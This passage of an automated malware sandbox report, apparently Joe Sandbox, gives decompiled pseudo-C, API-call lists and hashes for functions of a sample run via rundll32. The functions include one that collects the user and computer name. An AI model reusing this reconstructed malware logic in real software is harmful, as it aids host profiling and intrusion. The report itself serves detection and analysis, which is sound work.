								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x4b9a348; // 0x56d5a8
												_t28 = _t109 + 0x4b9b0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x4b9a348; // 0x56d5a8
														_t33 = _t79 + 0x4b9b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                0x04b92adb
                0x04b92ae4
                0x04b92ae5
                0x04b92ae9
                0x04b92aef
                0x04b92af5
                0x04b92afe
                0x04b92b04
                0x04b92b0e
                0x04b92b10
                0x04b92b16
                0x04b92b1b
                0x04b92b26
                0x04b92b2c
                0x04b92b31
                0x04b92c53
                0x04b92b37
                0x04b92b37
                0x04b92b44
                0x04b92b4a
                0x04b92b50
                0x04b92b54
                0x04b92b5a
                0x04b92b67
                0x04b92b6b
                0x04b92b71
                0x04b92b74
                0x04b92b7c
                0x04b92b7d
                0x04b92b81
                0x04b92b85
                0x04b92b88
                0x04b92b8b
                0x04b92b91
                0x04b92b9a
                0x04b92ba0
                0x04b92ba1
                0x04b92ba4
                0x04b92ba5
                0x04b92ba6
                0x04b92bae
                0x04b92baf
                0x04b92bb0
                0x04b92bb2
                0x04b92bb6
                0x04b92bba
                0x00000000
                0x00000000
                0x04b92bc0
                0x04b92bc9
                0x04b92bcf
                0x04b92bd9
                0x04b92bdd
                0x04b92bdf
                0x04b92bec
                0x04b92bf0
                0x04b92bf8
                0x04b92bfd
                0x04b92c0f
                0x04b92c11
                0x04b92c17
                0x04b92c17
                0x04b92c20
                0x04b92c20
                0x04b92c22
                0x04b92c28
                0x04b92c28
                0x04b92c2b
                0x04b92c31
                0x04b92c34
                0x04b92c3d
                0x00000000
                0x00000000
                0x00000000
                0x04b92c3d
                0x04b92b91
                0x04b92b8b
                0x04b92b74
                0x04b92c43
                0x04b92c43
                0x04b92c49
                0x04b92c49
                0x04b92c4f
                0x04b92c4f
                0x04b92c58
                0x04b92c5e
                0x04b92c5e
                0x04b92b1b
                0x04b92c67

                APIs
                • SysAllocString.OLEAUT32(04B99298), ref: 04B92B26
                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04B92C07
                • SysFreeString.OLEAUT32(00000000), ref: 04B92C20
                • SysFreeString.OLEAUT32(?), ref: 04B92C4F
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: String$Free$Alloclstrcmp
                • String ID: het
                • API String ID: 1885612795-578400553
                • Opcode ID: 2194aad95b8c586f4683d00fe87b4b245a9e6055d0785badc86ee09a2b8e6b05
                • Instruction ID: d47fb04ddb30bf48d95f62524280b7985542c9248274a4e9feaed6501626e906
                • Opcode Fuzzy Hash: 2194aad95b8c586f4683d00fe87b4b245a9e6055d0785badc86ee09a2b8e6b05
                • Instruction Fuzzy Hash: 61513C75D00509EFCF04DFA8C9889AEB7B9EF88701B1449D9E915EB220D731AE41CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B94408 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E04B94408() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x4b9a3cc; // 0x5109600
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x4b9a3cc; // 0x5109600
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x4b9a3cc; // 0x5109600
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x4b9b827) {
					HeapFree( *0x4b9a2d8, 0, _t10);
					_t7 =  *0x4b9a3cc; // 0x5109600
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                0x04b94408
                0x04b94411
                0x04b94421
                0x04b94421
                0x04b94426
                0x04b9442b
                0x00000000
                0x00000000
                0x04b9441b
                0x04b9441b
                0x04b9442d
                0x04b94432
                0x04b94436
                0x04b94449
                0x04b9444f
                0x04b9444f
                0x04b94458
                0x04b9445a
                0x04b9445e
                0x04b94464

                APIs
                • RtlEnterCriticalSection.NTDLL(051095C0), ref: 04B94411
                • Sleep.KERNEL32(0000000A), ref: 04B9441B
                • HeapFree.KERNEL32(00000000), ref: 04B94449
                • RtlLeaveCriticalSection.NTDLL(051095C0), ref: 04B9445E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID: Uet
                • API String ID: 58946197-2766386878
                • Opcode ID: a3541bfb100252707cea0b51c3fb9d2f81e30148082babe6a3ad396a13374cdb
                • Instruction ID: b7afd72e5e35563c7aad62a23fad520aa58318dd944e0a2528fd70c0c019a26b
                • Opcode Fuzzy Hash: a3541bfb100252707cea0b51c3fb9d2f81e30148082babe6a3ad396a13374cdb
                • Instruction Fuzzy Hash: 2BF0DAB4208241ABEF188B69EA89B1537F4EB48305B04806AE912D7390CE38AC05DA30
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B96173 Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E04B96173() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x76b5c742
						_v12 = _v12 + _t11;
						_t64 = E04B96601(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E04B94130(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4b96d10
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                0x04b96181
                0x04b96184
                0x04b96187
                0x04b9618d
                0x04b96192
                0x04b96198
                0x04b961a0
                0x04b961a3
                0x04b961a9
                0x04b961ae
                0x04b961b7
                0x04b961bb
                0x04b961c8
                0x04b961cc
                0x04b961ce
                0x04b961d2
                0x04b961d5
                0x04b961e5
                0x04b96238
                0x04b96239
                0x04b961e7
                0x04b961ec
                0x04b961ed
                0x04b961f2
                0x04b961f5
                0x04b96208
                0x00000000
                0x04b9620a
                0x04b9620d
                0x04b96212
                0x04b96220
                0x04b96223
                0x04b96229
                0x04b9622e
                0x00000000
                0x04b96230
                0x04b96230
                0x04b96233
                0x04b96233
                0x04b9622e
                0x04b96208
                0x04b9623e
                0x04b9623f
                0x04b961ae
                0x04b96245

                APIs
                • GetUserNameW.ADVAPI32(00000000,04B96D0E), ref: 04B96187
                • GetComputerNameW.KERNEL32(00000000,04B96D0E), ref: 04B961A3
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • GetUserNameW.ADVAPI32(00000000,04B96D0E), ref: 04B961DD
                • GetComputerNameW.KERNEL32(04B96D0E,76B5C740), ref: 04B96200
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04B96D0E,00000000,04B96D10,00000000,00000000,?,76B5C740,04B96D0E), ref: 04B96223
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                • String ID:
                • API String ID: 3850880919-0
                • Opcode ID: 02df1f4931177debfafb60e58ea463df8cfd975f95b885083fa095c23218c676
                • Instruction ID: 5d8eccba0f9d30dfabb29dcba1d3d263ff294611f54cb299d04a23eca7b23103
                • Opcode Fuzzy Hash: 02df1f4931177debfafb60e58ea463df8cfd975f95b885083fa095c23218c676
                • Instruction Fuzzy Hash: 7B21A7B6900108FFDF15DFE5D985CEEBBB8EF48744B5044AAE501E7240EB34AE459B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B94315 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E04B94315(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_t42 = _a16;
				_t48 = __eax;
				_t22 =  *0x4b9a348; // 0x56d5a8
				_t2 = _t22 + 0x4b9b67a; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0x4b9a2ec >= 5) {
					_t30 = E04B96BEF(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x4b9a2ec =  *0x4b9a2ec + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E04B96821(_t50, _t49);
					_t34 = E04B9722B(_t49, _t50);
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0x4b9a2ec < 5) {
							 *0x4b9a2ec =  *0x4b9a2ec & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E04B9554C();
					HeapFree( *0x4b9a2d8, 0, _t49);
					goto L9;
				}
				_t51 =  *0x4b9a3e0; // 0x5109cf0
				if(RtlAllocateHeap( *0x4b9a2d8, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E04B911DD(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
				goto L5;
			}















                0x04b9431c
                0x04b94323
                0x04b94327
                0x04b9432c
                0x04b94337
                0x04b94347
                0x04b94396
                0x04b9439b
                0x04b9439b
                0x04b9439e
                0x04b943a2
                0x04b943dc
                0x04b943dc
                0x04b943e2
                0x04b943e9
                0x04b943e9
                0x04b943a4
                0x04b943a7
                0x04b943a9
                0x04b943b6
                0x04b943b8
                0x04b943bf
                0x04b943f6
                0x04b943fb
                0x04b943fd
                0x04b943ff
                0x04b943ff
                0x00000000
                0x04b943fd
                0x04b943c1
                0x04b943c8
                0x04b943d6
                0x00000000
                0x04b943d6
                0x04b94349
                0x04b94364
                0x04b9437e
                0x00000000
                0x04b9437e
                0x04b94377
                0x00000000

                APIs
                • wsprintfA.USER32 ref: 04B94337
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04B9435C
                  • Part of subcall function 04B911DD: GetTickCount.KERNEL32 ref: 04B911F4
                  • Part of subcall function 04B911DD: wsprintfA.USER32 ref: 04B91241
                  • Part of subcall function 04B911DD: wsprintfA.USER32 ref: 04B9125E
                  • Part of subcall function 04B911DD: wsprintfA.USER32 ref: 04B91280
                  • Part of subcall function 04B911DD: wsprintfA.USER32 ref: 04B912A7
                  • Part of subcall function 04B911DD: wsprintfA.USER32 ref: 04B912C8
                  • Part of subcall function 04B911DD: wsprintfA.USER32 ref: 04B912F3
                  • Part of subcall function 04B911DD: HeapFree.KERNEL32(00000000,?), ref: 04B91306
                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 04B943D6
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: wsprintf$Heap$Free$AllocateCountTick
                • String ID: Uet
                • API String ID: 1307794992-2766386878
                • Opcode ID: dfd50f8df4507e77cb516376b062410d0604afb1062dd5ee3f5941d3b71d0b73
                • Instruction ID: 9d639c21caf679f6ab1e0ae860fd60d624cb1df34d35092fd4cf553446fcdc8f
                • Opcode Fuzzy Hash: dfd50f8df4507e77cb516376b062410d0604afb1062dd5ee3f5941d3b71d0b73
                • Instruction Fuzzy Hash: 53312876604208EBDF01DFA4D984A9A7BFCFB48354F208076F901A7250EB34AE55DBB1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B97262 Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                Download Yara Rule
                APIs
                • SysAllocString.OLEAUT32(?), ref: 04B9729D
                • SysFreeString.OLEAUT32(00000000), ref: 04B97382
                  • Part of subcall function 04B92AD6: SysAllocString.OLEAUT32(04B99298), ref: 04B92B26
                • SafeArrayDestroy.OLEAUT32(00000000), ref: 04B973D5
                • SysFreeString.OLEAUT32(00000000), ref: 04B973E4
                  • Part of subcall function 04B92960: Sleep.KERNEL32(000001F4), ref: 04B929A8
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: String$AllocFree$ArrayDestroySafeSleep
                • String ID:
                • API String ID: 3193056040-0
                • Opcode ID: fa5535032ba767e5396652493e5e1904719d24365e1dae2dfa722266a4dfea68
                • Instruction ID: 95b9cc76938eb2cd6c290093d80ea4b65401f868e373ad4160d1dc8962505759
                • Opcode Fuzzy Hash: fa5535032ba767e5396652493e5e1904719d24365e1dae2dfa722266a4dfea68
                • Instruction Fuzzy Hash: 6E514E75510609EFDB01CFA8C844A9EB7F5FF88740B1488B9E915DB210EB35ED06CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B9755C Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                Download Yara Rule
                C-Code - Quality: 85%
                			E04B9755C(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04B9180C(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04B9468A(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04B927F8(_t101,  &_v428, _a8, _t96 - _t81);
					E04B927F8(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E04B9468A(_t101, 0x4b9a1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04B9468A(_a16, _a4);
						E04B97898(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04B9837A();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04B98374();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E04B97A44(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E04B92D79(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04B96A0A(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x4b9a1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                0x04b9755f
                0x04b9756b
                0x04b97571
                0x04b97576
                0x04b9757a
                0x04b976ec
                0x04b976f0
                0x04b976f0
                0x04b97580
                0x04b97584
                0x04b97588
                0x04b9758b
                0x04b97596
                0x04b9759c
                0x04b975a1
                0x04b975a4
                0x04b975be
                0x04b975cd
                0x04b975d9
                0x04b975e3
                0x04b975e8
                0x04b975ea
                0x04b975ed
                0x04b976a4
                0x04b976aa
                0x04b976bb
                0x04b976ce
                0x04b976e4
                0x00000000
                0x04b976e9
                0x04b975f6
                0x04b975fd
                0x04b97601
                0x04b97607
                0x04b97609
                0x04b9760b
                0x04b9760d
                0x04b9760f
                0x04b97619
                0x04b9761e
                0x04b97620
                0x04b97622
                0x04b97623
                0x04b97624
                0x04b97625
                0x04b9762c
                0x04b97633
                0x04b97636
                0x04b97636
                0x04b97603
                0x04b97603
                0x04b97603
                0x04b9763e
                0x04b97646
                0x04b97652
                0x04b97657
                0x04b97657
                0x04b9765c
                0x00000000
                0x00000000
                0x04b9765e
                0x04b97661
                0x04b9766e
                0x00000000
                0x00000000
                0x04b97670
                0x04b97670
                0x04b9767d
                0x04b97657
                0x04b9765c
                0x00000000
                0x00000000
                0x00000000
                0x04b9765c
                0x04b97687
                0x04b9768a
                0x04b9768d
                0x04b97694
                0x04b97694
                0x04b976a1
                0x00000000
                0x04b976a1
                0x04b9758d
                0x04b97591
                0x04b97592
                0x04b97594
                0x00000000
                0x00000000
                0x00000000
                0x04b97594
                0x00000000

                APIs
                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04B9760F
                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04B97625
                • memset.NTDLL ref: 04B976CE
                • memset.NTDLL ref: 04B976E4
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: memset$_allmul_aulldiv
                • String ID:
                • API String ID: 3041852380-0
                • Opcode ID: 756353b9d93c461e06545a5e2c0f25b87744cf5cf1461839df97741a6d830253
                • Instruction ID: ee4ab0f0d55cf553f7865df4c2442442d85bd5902ef3cd4e68393be48a400512
                • Opcode Fuzzy Hash: 756353b9d93c461e06545a5e2c0f25b87744cf5cf1461839df97741a6d830253
                • Instruction Fuzzy Hash: 87417F72A10219EBEF10AF68CC40BEE77E9EF45314F1045B9B819A7290DA70BE55CB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B92634 Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                Download Yara Rule
                C-Code - Quality: 87%
                			E04B92634(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x4b9a310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x4b9a348; // 0x56d5a8
				_t3 = _t8 + 0x4b9b87a; // 0x61636f4c
				_t25 = 0;
				_t30 = E04B9686C(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x4b9a34c, 1, 0, _t30);
					E04B94130(_t30);
				}
				_t12 =  *0x4b9a2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04B928F6() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04B9708B(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x4b9a124( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E04B958B9(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                0x04b92635
                0x04b9263c
                0x04b92646
                0x04b9264a
                0x04b92650
                0x04b9265f
                0x04b92666
                0x04b9266a
                0x04b9267c
                0x04b9267e
                0x04b9267e
                0x04b92683
                0x04b9268a
                0x04b926e1
                0x04b926e1
                0x04b926e7
                0x04b926e9
                0x04b926e9
                0x04b926f3
                0x04b926f7
                0x04b92709
                0x04b92709
                0x04b9270d
                0x04b92713
                0x04b92713
                0x00000000
                0x04b926a3
                0x04b926a8
                0x04b926b0
                0x04b926b4
                0x04b926b8
                0x04b926b8
                0x04b926c5
                0x04b926c9
                0x04b926cd
                0x04b92722
                0x04b92728
                0x04b92728
                0x04b926db
                0x04b926df
                0x04b92716
                0x04b92718
                0x04b9271b
                0x04b9271b
                0x00000000
                0x04b92718
                0x04b926df
                0x00000000
                0x04b926c9

                APIs
                  • Part of subcall function 04B9686C: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05109D00,00000000,?,?,69B25F44,00000005,04B9A00C,4D283A53,?,?), ref: 04B968A2
                  • Part of subcall function 04B9686C: lstrcpy.KERNEL32(00000000,00000000), ref: 04B968C6
                  • Part of subcall function 04B9686C: lstrcat.KERNEL32(00000000,00000000), ref: 04B968CE
                • CreateEventA.KERNEL32(04B9A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04B9177C,?,?,?), ref: 04B92675
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                • WaitForSingleObject.KERNEL32(00000000,00004E20,04B9177C,00000000,00000000,?,00000000,?,04B9177C,?,?,?), ref: 04B926D5
                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04B9177C,?,?,?), ref: 04B92703
                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04B9177C,?,?,?), ref: 04B9271B
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                • String ID:
                • API String ID: 73268831-0
                • Opcode ID: 76cc27ab81ef93768d409e11728bfe49b88d14ef50f4ee1282cdae15a368bd62
                • Instruction ID: ae675c1168894a295687a045fcc6a3156d047b5871bd046490b3558f032f75f3
                • Opcode Fuzzy Hash: 76cc27ab81ef93768d409e11728bfe49b88d14ef50f4ee1282cdae15a368bd62
                • Instruction Fuzzy Hash: 8E21E432A00311BBDF255E789C84A6B77E9FF48714B150EFAFD51EB200DA39EC118654
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B916CD Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                Download Yara Rule
                C-Code - Quality: 39%
                			E04B916CD(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
